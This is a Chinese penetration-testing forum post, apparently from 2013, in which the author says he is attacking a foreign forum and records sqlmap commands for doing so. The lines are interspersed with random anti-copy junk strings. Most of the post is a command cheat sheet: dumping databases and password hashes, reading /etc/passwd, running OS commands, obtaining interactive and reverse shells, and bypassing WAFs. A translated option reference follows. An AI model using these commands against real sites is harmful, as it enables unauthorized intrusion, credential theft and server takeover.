中国网络渗透测试联盟
标题:
sqlmap注入命令的使用方法
[打印本页]
作者:
admin
时间:
2013-4-4 22:26
标题:
sqlmap注入命令的使用方法
今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、
4 }0 }. q+ c t% j& ?) f R
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “
http://www.xxoo.com/news?id=1
″ –current-db #获取当前数 据库名称
1 c" t k) M$ s: N4 p) E# Q
sqlmap -u “
http://www.xxoo.com/news?id=1
″ –tables -D “db_name”#列 表名
8 M: ]( P! o; B: u0 D. M- O
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
. x' g) Q) i4 N& ]1 s
* S3 e( ~! j3 ?
sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v
" E* G5 }) p9 B. q Z, B
0 #获取字段内容
5 c! Q; _: @0 v5 K' c! a8 u E; i
7 r* S9 [2 S4 Q
******************信息获取******************
1 k. A6 _' o6 P, q+ k. s6 W
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型
+ |2 u$ s7 b1 h% N
sqlmap -u “http://url/news?id=1″ –users #列数据库用户
8 I( r( S9 x O' w; d+ {( A: [6 v
sqlmap -u “http://url/news?id=1″ –dbs#列数据库
& E# U7 f/ B B9 U
sqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码
1 R* N/ C1 A/ s! L4 G3 s
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码
0 G, u: V3 i# o, D. j
sqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”
7 }, v9 H- t2 V& b- N% Q
–start 1 –stop 20 #列出指定字段,列出20 条
& b$ x8 a, x5 v, T. |& [
sqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表
9 v* I0 u" Z+ |" Z2 B4 N
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
. w0 C+ E e: h9 r
sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
" `. ]( g& b, u g
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
( d# b) {$ I( P# k# g7 L
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
+ ~$ f. U# c0 |( h
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
5 W5 N! ~" C7 p
sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
7 v& u$ K4 D# q: D! K: g/ b
sqlmap -u “http://url/news?id=1″-b #获取banner信息
! w* d6 J7 P, b; t% L& I
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入
8 y* D* u3 D9 A W8 C' h
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
$ i! Q) g& N1 u, \# c
sqlmap -u “http://url/news?id=1″ –proxy“
http://127.0.0.1:8118
” #代理注 入
1 r+ ?3 u. \! h) r% F
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词
" V% J. `+ @' _
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令
; `9 O2 O L+ \
sqlmap -u “http://url/news?id=1″ –file /etc/passwd
1 H! _0 @/ X/ D- c
sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
4 n9 h/ L& W( i2 _1 K- |/ N
sqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
$ w3 M" G2 x- @
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表
4 b# e x% z5 D6 A! V$ a
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
( ?1 O" A( `5 }" J; W
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度
2 {( A, \1 b% i" o
***********高级用法*************
6 z* D: k+ L( S, Q: f# H" ]# l4 X
-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
( y, J& |+ Y* k" H$ V& q: M
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问
5 z. U% @9 g: u
–technique 测试指定注入类型\使用的技术
0 [8 M8 i; K! O6 t L O. N
不加参数默认测试所有注入技术
9 v% |6 M @; }& ?1 U0 n" j
• B: 基于布尔的SQL 盲注
% @8 T& E+ Y2 x- ?2 }
• E: 基于显错sql 注入
/ Y2 [2 U: H( U5 ]! }
• U: 基于UNION 注入
" m4 A2 }9 e( c/ a3 E
• S: 叠层sql 注入
; ~8 c; e& o4 @4 f$ k' ~/ @) {
• T: 基于时间盲注
/ I6 L( p7 A: `; P9 \( w
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
H# \7 g7 f9 T2 k# B3 `' M, P" N
–tamper 插件所在目录
' Q9 o6 f8 H% l8 B" X' M
\sqlmap-dev\tamper
$ b+ K; l% ?( m& J, _! r
sqlmap -u “http://
www.2cto.com
/news?id=1″ –smart –level 3 –users # smart 智 能
, e! S; v% f6 I0 ~* N1 c, Z
level 执行测试等级 攻击实例:
! f8 o$ }/ ?$ ?5 L7 U
Sqlmap -u “http://url/news?id=1&Submit=Submit”
% o- Y0 Z' z4 b; P
–cookie=”PHPSESSID=41aa833e6d0d
* G) M$ c- R& l8 X6 J
28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
3 g5 K6 s C" J9 p0 i& K! e% q
–password
* [! q6 J, S. ~$ Z
参考文档:
http://sqlmap.sourceforge.net/doc/README.html
. T3 o% Q5 s7 c- Z/ b# |$ g9 F
***********安装最新版本*************
0 I+ b$ f H: s0 Y) z. J8 p
ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
+ \* f& A1 j; I; ^' |' A' m
sudo svn checkout
https://svn.sqlmap.org/sqlmap/trunk/sqlmap
sqlmap-dev
$ y" {# E+ {- e: E, g" d3 E$ T
安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件
7 m5 j( v. l# m6 p+ v
sudo vim /home/当前用户/.bashrc
6 c. p" d6 e3 i' P6 ^2 {
#任意位置加上:
" ]# n+ O! X& E) I/ o0 K
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效
' C' w T# C5 `. G
如果想对所有用户有效 可设置全局 编辑下面的文件
9 e/ v A! ~" Y# N& q d
vim /etc/profile
' [1 W8 D2 ?/ y, G1 q" s
同样加上:
, K, X) \1 K* G
alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
! e5 d/ j/ R1 g" \$ \" C9 G, o
******************windows 7 (x64) sqlmap install (SVN)************
7 x$ |' u7 m8 ^
http://www.python.org/getit/
安装python
; \6 v# j) ?5 o& ]
http://www.sliksvn.com/en/download
安装windows svn client
" O9 I6 N6 w/ c2 m: x9 ]7 t
svn checkout
https://svn.sqlmap.org/sqlmap/trunk/sqlmap
sqlmap-dev
8 r# Q1 _6 W9 M6 {
安装sqlmap
' y* K9 j) \; [* b
*修改环境变量
( W% ]0 g: N8 y8 F. C' ~% y) F- ?
–version 显示程序的版本号并退出
( f% m* ~, E+ o/ I
-h, –help 显示此帮助消息并退出
; O. c% ~& D) J/ R9 D5 O* j
-v VERBOSE 详细级别:0-6(默认为1)
0 X8 y- o# P- h7 {% x7 t) _3 ]7 |
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。
/ d3 Y, o# D0 P4 f2 p' g# o
-d DIRECT 直接连接到数据库。
9 D3 q+ Y' p8 P# T
-u URL, –url=URL 目标URL。
. J2 E! c3 m2 e. \ S+ K4 }% G- h
-l LIST 从Burp 或WebScarab 代理的日志中解析目标。
( X$ P# q; A8 u
-r REQUESTFILE 从一个文件中载入HTTP 请求。
8 d S( F# }" Z
-g GOOGLEDORK 处理Google dork 的结果作为目标URL。
( ^; r" y' y) O0 c/ l% x' V' [
-c CONFIGFILE 从INI 配置文件中加载选项。
, H% K4 n+ c% l! A4 j
Request(请求)::
$ A2 f% h) K( o
这些选项可以用来指定如何连接到目标URL。
' m# |$ b4 S& [2 L9 q9 H4 L6 _
–data=DATA 通过POST 发送的数据字符串
" \% T# B& m5 R/ p8 ^$ ?
–cookie=COOKIE HTTP Cookie 头
. c! k; N4 p, T; X3 C- J8 n4 K
–cookie-urlencode URL 编码生成的cookie 注入
3 m2 ]5 u$ j) h: R2 F4 f( y9 e* D
–drop-set-cookie 忽略响应的Set –Cookie 头信息
0 F* B( p6 v, [% e- b- [' n
2 d2 C1 s5 m- C* y, M
–user-agent=AGENT 指定 HTTP User –Agent 头
. L. D0 D. \4 t
–random-agent 使用随机选定的HTTP User –Agent 头
, T" }1 ]1 ^& {9 W$ q7 E1 l4 s) ?
–referer=REFERER 指定 HTTP Referer 头
7 k: c1 L! a, o$ m9 n7 I/ I+ v- a
–headers=HEADERS 换行分开,加入其他的HTTP 头
8 |6 J6 x( @0 p: N9 T, B
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
/ J3 v6 B: z3 t/ Q2 a
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)
4 A, M3 A5 a$ Q$ ]0 n5 I' p
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)
9 V L) y3 H( `6 u' ]# @' Z
–proxy=PROXY 使用HTTP 代理连接到目标URL
[0 k: w. q" c' J" \
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)
) i2 Q! I% z( x! @: y9 w( H4 t
–ignore-proxy 忽略系统默认的HTTP 代理
$ l/ S6 M# u) [5 x' F3 E. ~
–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒
, n6 u: s5 `) |0 t: \8 B/ T
–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
) w3 C6 k& M! K( {7 v: r
–retries=RETRIES 连接超时后重新连接的时间(默认3)
( R& A# Y& u: e: G ]* w2 {
–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
/ K4 k! B7 T! m% p) V
–safe-url=SAFURL 在测试过程中经常访问的url 地址
6 Y" C4 V; F+ o- a* \. n o I
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
9 S: ?* O* w4 | v& P( `
Optimization(优化): 这些选项可用于优化SqlMap 的性能。
% Z+ K7 @& G; g" @ j3 [# B0 S; n
-o 开启所有优化开关
! G8 b/ M) n- ^6 d0 e4 s
–predict-output 预测常见的查询输出
! j, K# d& k& s" ?
–keep-alive 使用持久的HTTP(S)连接
7 {! j* ?' P2 O6 x
–null-connection 从没有实际的HTTP 响应体中检索页面长度
7 s# T/ \% D! [' ^: L* w2 o3 l( X9 a
–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)
, R1 h8 a7 p+ G& p& N; W
Injection(注入):
6 X+ l4 O& |3 [) w
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
" `6 Y2 Q( c7 k- |; w
-p TESTPARAMETER 可测试的参数(S)
( g% o: e( e' ^- G2 r
–dbms=DBMS 强制后端的DBMS 为此值
7 q: r, ], \0 p* u( B. S
–os=OS 强制后端的DBMS 操作系统为这个值
& @1 D3 Z/ D& _
–prefix=PREFIX 注入payload 字符串前缀
( l" m6 |/ a+ ~) j' _
–suffix=SUFFIX 注入 payload 字符串后缀
9 n2 o+ F" U# b8 r, n
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据
. |& q; M0 o8 L- @6 l4 S7 C8 l9 |
Detection(检测):
2 [% t8 d- F# a x3 r/ h
这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。
6 [9 y% G" }2 d8 ~3 J* O* d/ e9 g
–level=LEVEL 执行测试的等级(1-5,默认为1)
* |( N/ c- R# G/ G: N
–risk=RISK 执行测试的风险(0-3,默认为1)
$ u; b- x! l b. H! |4 n0 Z
–string=STRING 查询时有效时在页面匹配字符串
4 K! d! V; v, w0 G+ _# C+ q
–regexp=REGEXP 查询时有效时在页面匹配正则表达式
; I5 \9 E0 V( d0 U
–text-only 仅基于在文本内容比较网页
! j9 ?8 y6 @/ q5 E; j
Techniques(技巧): 这些选项可用于调整具体的SQL 注入测试。
# m& R7 x, n/ R2 o5 K6 R
–technique=TECH SQL 注入技术测试(默认BEUST)
3 P! {! u1 d# W# ^/ V9 W0 s
–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)
) F5 A: M+ H2 p! C9 e( Q* F
–union-cols=UCOLS 定列范围用于测试UNION 查询注入
! F }. i+ ?" z& N$ Z+ B
–union-char=UCHAR 用于暴力猜解列数的字符
$ P2 p7 b- G% q+ y
Fingerprint(指纹):
* m8 p* r/ S% D, a
-f, –fingerprint 执行检查广泛的DBMS 版本指纹
. d# }! O. c; ~) m* U+ n
Enumeration(枚举):
7 R9 f: I6 ]9 x! ?
; o: Y, K7 N& i. ]
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。
' G- q% y1 h" t: H8 ~/ O7 |
-b, –banner 检索数据库管理系统的标识
, \" F0 ]3 p D" o6 p; t+ N6 e
–current-user 检索数据库管理系统当前用户
$ L6 } g% i* D% ~3 A6 y$ d" V/ ~) r
–current-db 检索数据库管理系统当前数据库
( \& `1 |0 ^' X+ H! T
–is-dba 检测DBMS 当前用户是否DBA
' I3 U5 r- }3 L& t2 R R
–users 枚举数据库管理系统用户
, I1 }- B7 J; H% p; _6 k& ?6 n
–passwords 枚举数据库管理系统用户密码哈希
2 k( m8 n- z( T7 C* M& G" f6 p2 P
–privileges 枚举数据库管理系统用户的权限
$ a W6 l% L0 }. ^( Z% D
–roles 枚举数据库管理系统用户的角色
, O e2 I) l w' C/ }/ X0 l. a0 ^% K8 Z
–dbs 枚举数据库管理系统数据库
( y2 C( B- J0 s
–tables 枚举的DBMS 数据库中的表
0 E1 |, @& b; Y; e& K
–columns 枚举DBMS 数据库表列
& Y% U7 O. O4 M5 f' g9 u
–dump 转储数据库管理系统的数据库中的表项
' S8 b/ P2 h. {6 R2 j$ I! [ R
–dump-all 转储所有的DBMS 数据库表中的条目
6 ]- J! l- y* j6 ~
–search 搜索列(S),表(S)和/或数据库名称(S)
! V* P1 R# Z6 d7 @2 x. P8 c5 y5 P
-D DB 要进行枚举的数据库名
2 _+ s* o3 ~2 l, J2 H& m
-T TBL 要进行枚举的数据库表
" \3 u+ o9 m. z2 b, m) f/ ]. J
-C COL 要进行枚举的数据库列
2 @+ n& \1 I- W! K# S# l3 Y, A( m
-U USER 用来进行枚举的数据库用户
) j; ~1 } P: P2 U- Y7 x d7 r* ~2 E
–exclude-sysdbs 枚举表时排除系统数据库
% N) S. f& W4 t' x% `3 Z
–start=LIMITSTART 第一个查询输出进入检索
0 A" R( U+ k6 o8 W! w- L
–stop=LIMITSTOP 最后查询的输出进入检索
/ A) [4 X( G. ?0 |8 U
–first=FIRSTCHAR 第一个查询输出字的字符检索
; G5 n u1 g7 s# w, v. t$ k
–last=LASTCHAR 最后查询的输出字字符检索
, q& I" \) Y7 r
–sql-query=QUERY 要执行的SQL 语句
- h! F+ P8 H4 v4 q+ j* Y
–sql-shell 提示交互式SQL 的shell
* A2 P- [1 {0 G8 M3 J" S- N$ o
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。
( O5 |/ ]0 l! }
–common-tables 检查存在共同表
$ S+ {) W% ]! k1 r5 j/ K& r/ ^& n
–common-columns 检查存在共同列
* M7 b9 Y/ G( I& N* \* p
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
4 j: i7 O) A: V2 ~& D
–udf-inject 注入用户自定义函数
0 V% T- Q8 F8 Q* w& B! u/ Z+ h- c- _# L
–shared-lib=SHLIB 共享库的本地路径
. ?- v) i/ W7 F7 @* ?$ l
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
( e8 S( p) d3 [/ X7 p; x9 N
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件
$ r# X3 F1 x$ p$ K! X% ]: o! m
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
* P# m$ W$ O$ b5 |3 s: ^" `0 i
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
8 W- V, C4 b R- H' Q5 {9 P
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。
7 \! j. b' D' M+ e& L; Y
–os-cmd=OSCMD 执行操作系统命令
& [+ ?" K+ r s% d
–os-shell 交互式的操作系统的shell
% u$ j; e7 W; R# ?7 q O3 }& o* k9 I
–os-pwn 获取一个OOB shell,meterpreter 或VNC
# a! z4 o# v+ f0 w, `. ?; m3 P& Y+ e
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC
2 @6 `" _4 K6 a# A
–os-bof 存储过程缓冲区溢出利用
8 |; A' z" v: Y& r! n) Y
–priv-esc 数据库进程用户权限提升
8 G$ n' |2 W0 Q6 J
–msf-path=MSFPATH Metasploit Framework 本地的安装路径
! z$ `' P- E4 c! w; G4 k/ k! U: \
–tmp-path=TMPPATH 远程临时文件目录的绝对路径
. q" u4 s% j3 J0 B' a, n
v. n& E, u& T( j
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
7 E8 e5 P( s1 D I" E
–reg-read 读一个Windows 注册表项值
( @1 h) P4 H% A' U
–reg-add 写一个Windows 注册表项值数据
/ B0 h2 n7 h6 y. D0 W: S0 v
–reg-del 删除Windows 注册表键值
5 p+ _* d" I V! P; U1 A
–reg-key=REGKEY Windows 注册表键
2 \7 l2 e+ ?0 \6 U$ H! z
–reg-value=REGVAL Windows 注册表项值
: j1 O9 h% |& ]1 _; M0 \
–reg-data=REGDATA Windows 注册表键值数据
4 i3 h) d9 z1 Z' ~5 @3 w, Q8 p
–reg-type=REGTYPE Windows 注册表项值类型
+ X2 G' W- l2 j3 q2 ]! k0 Q
General(一般): 这些选项可以用来设置一些一般的工作参数。
) y; h' I" W5 R \
-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中
/ C$ i/ }! g3 Q, h3 U5 k
-s SESSIONFILE 保存和恢复检索会话文件的所有数据
1 O9 R0 ~2 o2 ]- D
–flush-session 刷新当前目标的会话文件
, a# ~$ Q; ^' Q0 H- [$ f3 t' k
–fresh-queries 忽略在会话文件中存储的查询结果
+ \) Z6 q. p* b) _# G8 S: S
–eta 显示每个输出的预计到达时间
! f& a/ d! }3 n
–update 更新SqlMap
5 p- l1 ] x5 p1 ~5 D
–save file 保存选项到INI 配置文件
7 N3 y" T5 L3 n- M( M$ T" F
–batch 从不询问用户输入,使用所有默认配置。
7 {3 O* Q; h7 ^& J
Miscellaneous(杂项):
1 H- Y! K, b- M5 j' m' S
–beep 发现SQL 注入时提醒
5 U2 r- ]& s: ? Q E( ~; z( ]# g
–check-payload IDS 对注入payloads 的检测测试
& `0 L3 I2 i1 T& H6 {
–cleanup SqlMap 具体的UDF 和表清理DBMS
1 _; l9 h- ^- j1 \2 q! X
–forms 对目标URL 的解析和测试形式
5 c% ~: B$ M ^5 K
–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
# y! q9 c+ X5 L# W# P
–page-rank Google dork 结果显示网页排名(PR)
( }: h& Z/ N/ ]3 U g
–parse-errors 从响应页面解析数据库管理系统的错误消息
& i! y4 S' Y8 d, z9 m0 {- P9 ~0 l
–replicate 复制转储的数据到一个sqlite3 数据库
' `$ _. f8 r" T, Q' b! m& b
–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
! w) O' Y) B) c( q" q" r- L' B
–wizard 给初级用户的简单向导界面
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2